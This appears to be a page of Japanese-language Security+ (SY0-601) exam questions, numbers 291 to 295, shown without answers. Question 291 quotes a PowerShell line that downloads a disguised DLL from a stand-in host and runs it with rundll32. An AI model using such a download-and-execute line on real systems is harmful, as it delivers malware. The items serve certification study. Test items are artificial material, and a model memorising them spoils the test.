SY0-601 試験問題 291

従業員が、Updates.Lnk という通常とは異なるファイルが添付された電子メールを受信しました。セキュリティ アナリストがファイルのリバース エンジニアリングを行ったところ、次のスクリプトが実行されることが判明しました。
C:\Windows\System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg
-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll アナリストが発見した内容を最もよく表しているのは次のどれですか?
  • SY0-601 試験問題 292

    データ所有者には、環境内に含まれるさまざまな種類のデータに対して適切なデータ分類と破棄方法を割り当てる役割が与えられています。

    SY0-601 試験問題 293

    新しく購入した企業 WAP は、可能な限り最も安全な方法で構成する必要があります。
    説明書
    ネットワーク図上の以下の項目をクリックし、それに応じて設定してください。
    ワップ
    DHCP サーバー
    AAA サーバー
    ワイヤレスコントローラー
    LDAP サーバー
    いつでもシミュレーションの初期状態に戻したい場合は、「すべてリセット」ボタンをクリックしてください。

    SY0-601 試験問題 294

    ある組織は、ネットワーク上でマルウェアが蔓延したため、インシデント対応計画を開始しました。組織はフォレンジック チームを招集し、インターネットに接続している Windows サーバーが最初の侵害の可能性のあるポイントであると特定しました。検出されたマルウェア ファミリは、手動でサーバーにログオンし、悪意のあるコードを実行することで配布されることがわかっています。感染ベクターからの再感染を防ぐには、次のどのアクションが最適ですか。
  • SY0-601 試験問題 295

    ある遊園地では、顧客の指紋を検証してチケットの共有が行われていないことを確認する生体認証システムを導入しています。遊園地のオーナーは何よりも顧客を重視しており、セキュリティよりも顧客の利便性を重視しています。このため、セキュリティ チームが最初に優先すべき機能は次のうちどれですか。